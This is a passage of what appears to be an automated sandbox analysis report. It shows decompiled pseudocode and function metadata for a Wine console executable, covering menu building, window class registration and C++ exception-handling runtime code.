						LoadStringW(_v12, 0x113,  &_v528, _t143);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x113,  &_v528);
						_t147 =  &_v528;
						_v564 = _t147;
						0x710000();
						LoadStringW(_v12, 0x114,  &_v528, _t147);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x114,  &_v528);
						_t151 =  &_v528;
						_v568 = _t151;
						0x710000();
						LoadStringW(_v12, 0x115,  &_v528, _t151);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x115,  &_v528);
						_t218 = _t200 - 0xffffffffffffff18;
						if(_a8 != 0) {
							InsertMenuW(_a4, 0xffffffff, 0xc00, 0, 0);
							_t218 = _t218 - 0x14;
						}
						_t155 =  &_v528;
						_v572 = _t155;
						0x710000();
						LoadStringW(_v12, 0x100,  &_v528, _t155);
						InsertMenuW(_a4, 0xffffffff, 0x410, _v16,  &_v528);
						_t159 =  &_v528;
						_v576 = _t159;
						0x710000();
						LoadStringW(_v12, 0x101,  &_v528, _t159);
						InsertMenuW(_a4, 0xffffffff, 0x400, 0x101,  &_v528);
						_t163 =  &_v528;
						_v580 = _t163;
						0x710000();
						_t225 = _t218 - 0xffffffffffffffb4;
						 *_t225 = _v12;
						_v580 = 0x102;
						_v576 =  &_v528;
						_v572 = _t163;
						LoadStringW(??, ??, ??, ??);
						_t226 = _t225 - 0x10;
						 *_t226 = _a4;
						_v580 = 0xffffffff;
						_v576 = 0x400;
						_v572 = 0x102;
						_v568 =  &_v528;
						InsertMenuW(??, ??, ??, ??, ??);
						_t200 = _t226 - 0x14;
						_v8 = 1;
					} else {
						_v8 = 0;
					}
				} else {
					_v8 = 0;
				}
				return _v8;
			}


































                                              0x00b1ae48
                                              0x00b1ae4e
                                              0x00b1ae51
                                              0x00b1ae58
                                              0x00b1ae70
                                              0x00b1ae77
                                              0x00b1ae89
                                              0x00b1ae8f
                                              0x00b1ae92
                                              0x00b1aeb6
                                              0x00b1aee7
                                              0x00b1aef0
                                              0x00b1aef6
                                              0x00b1aef9
                                              0x00b1af1d
                                              0x00b1af4e
                                              0x00b1af57
                                              0x00b1af5d
                                              0x00b1af60
                                              0x00b1af84
                                              0x00b1afb5
                                              0x00b1afbe
                                              0x00b1afc4
                                              0x00b1afc7
                                              0x00b1afeb
                                              0x00b1b01c
                                              0x00b1b025
                                              0x00b1b02b
                                              0x00b1b02e
                                              0x00b1b052
                                              0x00b1b083
                                              0x00b1b08c
                                              0x00b1b092
                                              0x00b1b095
                                              0x00b1b0b9
                                              0x00b1b0ea
                                              0x00b1b0f0
                                              0x00b1b0f7
                                              0x00b1b125
                                              0x00b1b12b
                                              0x00b1b12b
                                              0x00b1b12e
                                              0x00b1b134
                                              0x00b1b137
                                              0x00b1b15b
                                              0x00b1b18b
                                              0x00b1b194
                                              0x00b1b19a
                                              0x00b1b19d
                                              0x00b1b1c1
                                              0x00b1b1f2
                                              0x00b1b1fb
                                              0x00b1b201
                                              0x00b1b204
                                              0x00b1b209
                                              0x00b1b215
                                              0x00b1b218
                                              0x00b1b220
                                              0x00b1b224
                                              0x00b1b228
                                              0x00b1b22e
                                              0x00b1b23a
                                              0x00b1b23d
                                              0x00b1b245
                                              0x00b1b24d
                                              0x00b1b255
                                              0x00b1b259
                                              0x00b1b25f
                                              0x00b1b262
                                              0x00b1ae7d
                                              0x00b1ae7d
                                              0x00b1ae7d
                                              0x00b1ae5e
                                              0x00b1ae5e
                                              0x00b1ae5e
                                              0x00b1b273

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: CreateHandleMenuModule
                                              • String ID:
                                              • API String ID: 4123625242-0
                                              • Opcode ID: 76a04c0e59038a697f5b9bd5c3a50ca937efec981bb2bd9394da02383be21dd4
                                              • Instruction ID: 45060000b88b4b4334477f7fa6110d8ddb29ca0b5ddac1d42a4480dc5aea9d93
                                              • Opcode Fuzzy Hash: 76a04c0e59038a697f5b9bd5c3a50ca937efec981bb2bd9394da02383be21dd4
                                              • Instruction Fuzzy Hash: 64C1B4B48083189FD714EF68D44969EBBF4FB44310F10CA6DE8A997395DB789688CF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1BCD2 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 135COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: LongTextWindow$ColorObjectPaintSelect$BeginBrushCreateFillHandleItemLoadModuleParentRectSolidString
                                              • String ID: ASCII: abcXYZ
                                              • API String ID: 3404974346-732927841
                                              • Opcode ID: c4c0903b52ad28736a2c99d1188904acb4d37163e4a14931e1d9f574b5432403
                                              • Instruction ID: ca5c14e6f493724afd9b6a9f286210f73c797b948b0e71aaade16d1ba420b983
                                              • Opcode Fuzzy Hash: c4c0903b52ad28736a2c99d1188904acb4d37163e4a14931e1d9f574b5432403
                                              • Instruction Fuzzy Hash: 0E6195B58083149FCB04EFA8D58869EBFF4BF48301F10896DE88997354EB749988CF52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1A680 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 29%
                                              			E00B1A680(void* __edi, struct HINSTANCE__* _a4, intOrPtr _a8) {
				intOrPtr _v12;
				char _v216;
				char _v428;
				struct _WNDCLASSW _v468;
				char _v980;
				struct HINSTANCE__* _v984;
				char* _v988;
				char* _v992;
				char* _v996;
				intOrPtr _v1000;
				void* _v1008;
				intOrPtr _v1012;
				struct HINSTANCE__* _v1016;
				intOrPtr _v1020;
				char* _v1024;
				struct HINSTANCE__* _t110;
				struct HINSTANCE__* _t115;
				int _t117;
				intOrPtr* _t118;
				void* _t155;
				void* _t156;
				struct HINSTANCE__** _t165;
				struct HINSTANCE__** _t166;
				intOrPtr* _t167;
				intOrPtr* _t169;

				_t153 = __edi;
				L00B2B0CA();
				E00B1FC30(__edi,  &_v428, 0, 0xd4);
				_v428 = _a4;
				if(_a8 == 0) {
					_v1016 = 0;
					_v1012 =  &_v428 + 4;
					E00B13370(_t153);
					_t156 = _t155 - 8;
				} else {
					_v1016 = _a4;
					_v1012 =  &_v428 + 4;
					E00B1B960();
					_t156 = _t155 - 8;
				}
				E00B1F6B0( &_v216,  &_v428 + 4, 0xcc);
				_v468.style = 0;
				_v468.lpfnWndProc = E00B1BBB0;
				_v468.cbClsExtra = 0;
				_v468.cbWndExtra = 4;
				_v468.hInstance = GetModuleHandleW(0);
				_v468.hIcon = 0;
				_v468.hCursor = LoadCursorW(0, 0x7f00);
				_v468.hbrBackground = GetStockObject(4);
				_v468.lpszMenuName = 0;
				_v468.lpszClassName = L"WineConFontPreview";
				RegisterClassW( &_v468);
				_v468.style = 0;
				_v468.lpfnWndProc = E00B1BF30;
				_v468.cbClsExtra = 0;
				_v468.cbWndExtra = 4;
				_v468.hInstance = GetModuleHandleW(0);
				_v468.hIcon = 0;
				_v468.hCursor = LoadCursorW(0, 0x7f00);
				_v468.hbrBackground = GetStockObject(4);
				_v468.lpszMenuName = 0;
				_v468.lpszClassName = L"WineConColorPreview";
				RegisterClassW( &_v468);
				_t110 =  &_v980;
				_v1024 = _t110;
				0x710000();
				_t165 = _t156 - 0xffffffffffffffdc;
				_v984 = _t110;
				_v988 =  &_v980;
				_t113 =  !=  ? 0x121 : 0x120;
				_v992 =  !=  ? 0x121 : 0x120;
				 *_t165 = 0;
				_t115 = GetModuleHandleW(??);
				_t166 = _t165 - 4;
				 *_t166 = _t115;
				_v1024 = _v992;
				_v1020 = _v988;
				_v1016 = _v984;
				_t117 = LoadStringW(??, ??, ??, ??);
				_t167 = _t166 - 0x10;
				if(_t117 == 0) {
					 *_t167 =  &_v980;
					_v1024 = L"Setup";
					E00B211F7();
				}
				_t118 = _t167;
				 *((intOrPtr*)(_t118 + 4)) =  &_v428 + 4;
				 *_t118 =  &_v216;
				 *((intOrPtr*)(_t118 + 8)) = 0xcc;
				if(E00B1E02E() != 0) {
					if(_a8 != 0) {
						 *_t167 = _a4;
						_v1024 =  &_v428 + 4;
						E00B14AB0();
						_t169 = _t167 - 8;
						 *_t169 = _v428;
						E00B18E70();
						_t167 = _t169 - 4;
					}
					_v996 =  &_v428 + 4;
					if(_a8 == 0) {
						_v1000 = 0;
					} else {
						_v1000 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24));
					}
					 *_t167 = _v1000;
					_v1024 = _v996;
					E00B1C3B0();
					_v12 = 1;
				} else {
					_v12 = 1;
				}
				return _v12;
			}




























                                              0x00b1a680
                                              0x00b1a690
                                              0x00b1a6b0
                                              0x00b1a6b8
                                              0x00b1a6c2
                                              0x00b1a6f3
                                              0x00b1a6fa
                                              0x00b1a6fe
                                              0x00b1a703
                                              0x00b1a6c8
                                              0x00b1a6d4
                                              0x00b1a6d7
                                              0x00b1a6db
                                              0x00b1a6e0
                                              0x00b1a6e0
                                              0x00b1a724
                                              0x00b1a729
                                              0x00b1a739
                                              0x00b1a73f
                                              0x00b1a749
                                              0x00b1a765
                                              0x00b1a76b
                                              0x00b1a790
                                              0x00b1a7a6
                                              0x00b1a7ac
                                              0x00b1a7bc
                                              0x00b1a7cb
                                              0x00b1a7d4
                                              0x00b1a7e4
                                              0x00b1a7ea
                                              0x00b1a7f4
                                              0x00b1a810
                                              0x00b1a816
                                              0x00b1a83b
                                              0x00b1a851
                                              0x00b1a857
                                              0x00b1a867
                                              0x00b1a876
                                              0x00b1a87f
                                              0x00b1a885
                                              0x00b1a888
                                              0x00b1a88d
                                              0x00b1a890
                                              0x00b1a89c
                                              0x00b1a8b2
                                              0x00b1a8b5
                                              0x00b1a8bd
                                              0x00b1a8c4
                                              0x00b1a8ca
                                              0x00b1a8e1
                                              0x00b1a8e4
                                              0x00b1a8e8
                                              0x00b1a8ec
                                              0x00b1a8f0
                                              0x00b1a8f6
                                              0x00b1a8fc
                                              0x00b1a90e
                                              0x00b1a911
                                              0x00b1a915
                                              0x00b1a915
                                              0x00b1a929
                                              0x00b1a92b
                                              0x00b1a92e
                                              0x00b1a930
                                              0x00b1a93f
                                              0x00b1a955
                                              0x00b1a967
                                              0x00b1a96a
                                              0x00b1a96e
                                              0x00b1a973
                                              0x00b1a97c
                                              0x00b1a97f
                                              0x00b1a984
                                              0x00b1a984
                                              0x00b1a990
                                              0x00b1a99a
                                              0x00b1a9b9
                                              0x00b1a9a0
                                              0x00b1a9ac
                                              0x00b1a9ac
                                              0x00b1a9d0
                                              0x00b1a9d3
                                              0x00b1a9d7
                                              0x00b1a9df
                                              0x00b1a945
                                              0x00b1a945
                                              0x00b1a945
                                              0x00b1a9f1

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: HandleLoadModule$ClassCursorObjectRegisterStock$StringVisibleWindow
                                              • String ID: Setup$WineConColorPreview$WineConFontPreview$@.v
                                              • API String ID: 3977189380-1132709736
                                              • Opcode ID: 28ed17ff0909779931525e8a9e673ed3cad329e51043c9fd68de860650fe8319
                                              • Instruction ID: c9808c841bb7ef49dde0a0c2f489549f24053620fbd5274fe15add491717bd29
                                              • Opcode Fuzzy Hash: 28ed17ff0909779931525e8a9e673ed3cad329e51043c9fd68de860650fe8319
                                              • Instruction Fuzzy Hash: 6E91DAB19052189FDB50EF28D9497DDBBF4FB08344F4085AAE889E7250DB749A88CF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B17B20 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 281COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateEventW.KERNEL32 ref: 00B17BAE
                                              • EnterCriticalSection.KERNEL32 ref: 00B17C7A
                                              • MultiByteToWideChar.KERNEL32 ref: 00B17D09
                                              • LeaveCriticalSection.KERNEL32 ref: 00B17DBD
                                              • LeaveCriticalSection.KERNEL32 ref: 00B17F5A
                                              • EnterCriticalSection.KERNEL32 ref: 00B17F76
                                              • CloseHandle.KERNEL32 ref: 00B1800E
                                              • LeaveCriticalSection.KERNEL32 ref: 00B1802D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: CriticalSection$Leave$Enter$ByteCharCloseCreateEventHandleMultiWide
                                              • String ID: H$input restore failed: %#lx$input setup failed: %#lx
                                              • API String ID: 628538822-1542851097
                                              • Opcode ID: 0c8a7da7b359dabe54b514c437ab4783874223f9cdad445e6961efae02b17d75
                                              • Instruction ID: 31ed8491b646f597deee65d7a2f68581e6c8207f0c63b4ad452fbb44a98d3f10
                                              • Opcode Fuzzy Hash: 0c8a7da7b359dabe54b514c437ab4783874223f9cdad445e6961efae02b17d75
                                              • Instruction Fuzzy Hash: C4D119B5909215CFDB11EF68D5987AEBBF4FF48340F4088ADE48997240DB749A88CF52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B123E0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 177COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: Info$CharsetStartupTranslate
                                              • String ID: WineConsoleClass$@.v
                                              • API String ID: 3822699805-1808220505
                                              • Opcode ID: 35c6b95bf126c302bee1b1775800e75eb8dbd5f12c4df30c95a467311ab5d14c
                                              • Instruction ID: db011885c38444a2812b0c30a4c208df24535ece386a9ffe581155360e419f9c
                                              • Opcode Fuzzy Hash: 35c6b95bf126c302bee1b1775800e75eb8dbd5f12c4df30c95a467311ab5d14c
                                              • Instruction Fuzzy Hash: CF91B8B49042198FDB20DF68D994BDDBBF0FF08304F5089A9E889AB351DB759A94CF41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B12E20 Relevance: 16.7, APIs: 11, Instructions: 228COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: Object$DeleteReleaseSelectText$CreateFaceFontIndirectInfoMetrics
                                              • String ID:
                                              • API String ID: 2170087643-0
                                              • Opcode ID: 882000cd7f18be830f80aa28d0753c29484a8b125f2374dbd2bb6753f7338504
                                              • Instruction ID: f0196736d788d209d4e6b4e817d4e3cd30459f8792cf04e2c6c0dcf70323507c
                                              • Opcode Fuzzy Hash: 882000cd7f18be830f80aa28d0753c29484a8b125f2374dbd2bb6753f7338504
                                              • Instruction Fuzzy Hash: 3CB17378A04218DFCB14DF68D588AADBBF1FF49314F5584A9E889DB351DB30E984CB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B27A82 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 64%
                                              			E00B27A82(signed int __edx, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				signed int* _v52;
				intOrPtr _v56;
				signed int _v64;
				void* _v68;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				signed int _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t146;
				signed int _t152;
				void* _t155;
				signed char _t160;
				signed int _t161;
				void* _t163;
				void* _t166;
				void* _t169;
				intOrPtr* _t179;
				void* _t182;
				intOrPtr* _t183;
				signed int _t184;
				signed int _t185;
				signed int _t187;
				void* _t191;
				void* _t196;
				void* _t197;
				intOrPtr _t201;
				intOrPtr* _t202;
				signed int _t203;
				signed int _t210;
				signed int _t211;
				intOrPtr _t214;
				signed int* _t218;
				signed int _t219;
				signed int _t224;
				signed int _t225;
				signed int _t231;
				void* _t234;
				void* _t235;

				_t216 = __edx;
				_t218 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t204 = E00B28C58(_a8, _a16, _t218);
				_t235 = _t234 + 0xc;
				_v12 = _t204;
				if(_t204 < 0xffffffff || _t204 >= _t218[1]) {
					L67:
					E00B21BDC(_t202, _t204, _t216, _t218, _t225);
					asm("int3");
					__eflags = _v88;
					_push(_t202);
					_t203 = _v92;
					_push(_t225);
					_push(_t218);
					_t219 = _v108;
					if(__eflags != 0) {
						_push(_a24);
						_push(_t203);
						_push(_t219);
						_push(_v0);
						E00B279E9(_t203, _t219, _t225, __eflags);
						_t235 = _t235 + 0x10;
					}
					_t146 = _a36;
					__eflags = _t146;
					if(_t146 == 0) {
						_t146 = _t219;
					}
					E00B2425E(_t204, _t146, _v0);
					_t226 = _a28;
					_push( *_a28);
					_push(_a16);
					_push(_a12);
					_push(_t219);
					E00B27232(_t203, _t204, _t216, _t219, _a28, __eflags);
					E00B28C75(_t219, _a16,  *((intOrPtr*)(_t226 + 4)) + 1);
					_push(0x100);
					_push(_a32);
					_push( *((intOrPtr*)(_t203 + 0xc)));
					_push(_a16);
					_push(_a8);
					_push(_t219);
					_push(_v0);
					_t152 = E00B27429(_t203, _t216, _t219, _t226, __eflags);
					__eflags = _t152;
					if(_t152 != 0) {
						E00B2422E(_t152, _t219);
						return _t152;
					}
					return _t152;
				} else {
					_t202 = _a4;
					if( *_t202 != 0xe06d7363 ||  *((intOrPtr*)(_t202 + 0x10)) != 3 ||  *((intOrPtr*)(_t202 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
						L22:
						_t216 = _a12;
						_v8 = _a12;
						goto L24;
					} else {
						_t225 = 0;
						if( *((intOrPtr*)(_t202 + 0x1c)) != 0) {
							goto L22;
						} else {
							_t155 = E00B21C6E(_t202, _t204, _t216, _t218, 0);
							if( *((intOrPtr*)(_t155 + 0x10)) == 0) {
								L61:
								return _t155;
							} else {
								_t202 =  *((intOrPtr*)(E00B21C6E(_t202, _t204, _t216, _t218, 0) + 0x10));
								_t191 = E00B21C6E(_t202, _t204, _t216, _t218, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t191 + 0x14));
								if(_t202 == 0 ||  *_t202 == 0xe06d7363 &&  *((intOrPtr*)(_t202 + 0x10)) == 3 && ( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930521 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930522) &&  *((intOrPtr*)(_t202 + 0x1c)) == _t225) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E00B21C6E(_t202, _t204, _t216, _t218, _t225) + 0x1c)) == _t225) {
										L23:
										_t216 = _v8;
										_t204 = _v12;
										L24:
										_v52 = _t218;
										_v48 = 0;
										__eflags =  *_t202 - 0xe06d7363;
										if( *_t202 != 0xe06d7363) {
											L57:
											__eflags = _t218[3];
											if(_t218[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													E00B27EA7(_t204, _t216, _t218, _t225, _t202, _a8, _t216, _a16, _t218, _t204, _a28, _a32);
													_t235 = _t235 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags =  *((intOrPtr*)(_t202 + 0x10)) - 3;
											if( *((intOrPtr*)(_t202 + 0x10)) != 3) {
												goto L57;
											} else {
												__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930520;
												if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520) {
													L29:
													_t225 = _a32;
													__eflags = _t218[3];
													if(_t218[3] > 0) {
														E00B241BE(_t204,  &_v68,  &_v52, _t204, _a16, _t218, _a28);
														_t216 = _v64;
														_t235 = _t235 + 0x18;
														_t179 = _v68;
														_v44 = _t179;
														_v16 = _t216;
														__eflags = _t216 - _v56;
														if(_t216 < _v56) {
															_t210 = _t216 * 0x14;
															__eflags = _t210;
															_v32 = _t210;
															do {
																_t211 = 5;
																_t182 = memcpy( &_v104,  *((intOrPtr*)( *_t179 + 0x10)) + _t210, _t211 << 2);
																_t235 = _t235 + 0xc;
																__eflags = _v104 - _t182;
																if(_v104 <= _t182) {
																	__eflags = _t182 - _v100;
																	if(_t182 <= _v100) {
																		_t214 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																			_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x1c)) + 0xc));
																			_t184 = _t183 + 4;
																			__eflags = _t184;
																			_v36 = _t184;
																			_t185 = _v88;
																			_v40 =  *_t183;
																			_v24 = _t185;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t231 = _v40;
																				_t224 = _v36;
																				__eflags = _t231;
																				if(_t231 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_t187 = E00B2781D( &_v84,  *_t224, _t217);
																						_t235 = _t235 + 0xc;
																						__eflags = _t187;
																						if(_t187 != 0) {
																							break;
																						}
																						_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																						_t231 = _t231 - 1;
																						_t224 = _t224 + 4;
																						__eflags = _t231;
																						if(_t231 > 0) {
																							continue;
																						} else {
																							_t214 = _v20;
																							_t185 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					_push(_a32);
																					_push(_a28);
																					_push( &_v104);
																					_push( *_t224);
																					_push( &_v84);
																					_push(_a20);
																					_push(_a16);
																					_push(_v8);
																					_push(_a8);
																					_push(_t202);
																					L68();
																					_t235 = _t235 + 0x30;
																				}
																				L43:
																				_t216 = _v16;
																				goto L44;
																				L40:
																				_t214 = _t214 + 1;
																				_t185 = _t185 + 0x10;
																				_v20 = _t214;
																				_v24 = _t185;
																				__eflags = _t214 - _v92;
																			} while (_t214 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t216 = _t216 + 1;
																_t179 = _v44;
																_t210 = _v32 + 0x14;
																_v16 = _t216;
																_v32 = _t210;
																__eflags = _t216 - _v56;
															} while (_t216 < _v56);
															_t218 = _a20;
															_t225 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E00B1DC55(_t202, _t218, _t225, __eflags);
														_t204 = _t202;
													}
													__eflags = ( *_t218 & 0x1fffffff) - 0x19930521;
													if(( *_t218 & 0x1fffffff) < 0x19930521) {
														L60:
														_t155 = E00B21C6E(_t202, _t204, _t216, _t218, _t225);
														__eflags =  *(_t155 + 0x1c);
														if( *(_t155 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t160 = _t218[8] >> 2;
														__eflags = _t218[7];
														if(_t218[7] != 0) {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																_push(_t218[7]);
																_t161 = E00B27642();
																_t204 = _t202;
																__eflags = _t161;
																if(_t161 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *((intOrPtr*)(E00B21C6E(_t202, _t204, _t216, _t218, _t225) + 0x10)) = _t202;
																	_t169 = E00B21C6E(_t202, _t204, _t216, _t218, _t225);
																	_t206 = _v8;
																	 *((intOrPtr*)(_t169 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930521;
													if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930521) {
														goto L29;
													} else {
														__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930522;
														if( *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E00B21C6E(_t202, _t204, _t216, _t218, _t225) + 0x1c));
										_t196 = E00B21C6E(_t202, _t204, _t216, _t218, _t225);
										_push(_v16);
										 *(_t196 + 0x1c) = _t225;
										_t197 = E00B27642();
										_t206 = _t202;
										if(_t197 != 0) {
											goto L23;
										} else {
											_t218 = _v16;
											_t255 =  *_t218 - _t225;
											if( *_t218 <= _t225) {
												L62:
												E00B2117B(_t202, _t206, _t216, _t218, _t225, __eflags);
											} else {
												while(1) {
													_t206 =  *((intOrPtr*)(_t225 + _t218[1] + 4));
													if(E00B2740A( *((intOrPtr*)(_t225 + _t218[1] + 4)), _t255, 0xb348c0) != 0) {
														goto L63;
													}
													_t225 = _t225 + 0x10;
													_t201 = _v20 + 1;
													_v20 = _t201;
													_t255 = _t201 -  *_t218;
													if(_t201 >=  *_t218) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t202);
											E00B1DC55(_t202, _t218, _t225, __eflags);
											_t204 =  &_v64;
											E00B273C6( &_v64);
											E00B28D05( &_v64, 0xb3328c);
											L64:
											 *((intOrPtr*)(E00B21C6E(_t202, _t204, _t216, _t218, _t225) + 0x10)) = _t202;
											_t163 = E00B21C6E(_t202, _t204, _t216, _t218, _t225);
											_t204 = _v8;
											 *(_t163 + 0x14) = _v8;
											__eflags = _t225;
											if(_t225 == 0) {
												_t225 = _a8;
											}
											E00B2425E(_t204, _t225, _t202);
											L00B2731A(_a8, _a16, _t218);
											_t166 = E00B27332(_t218);
											_t235 = _t235 + 0x10;
											_push(_t166);
											E00B276DC(_t202, _t204, _t216, _t218, _t225, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}



























































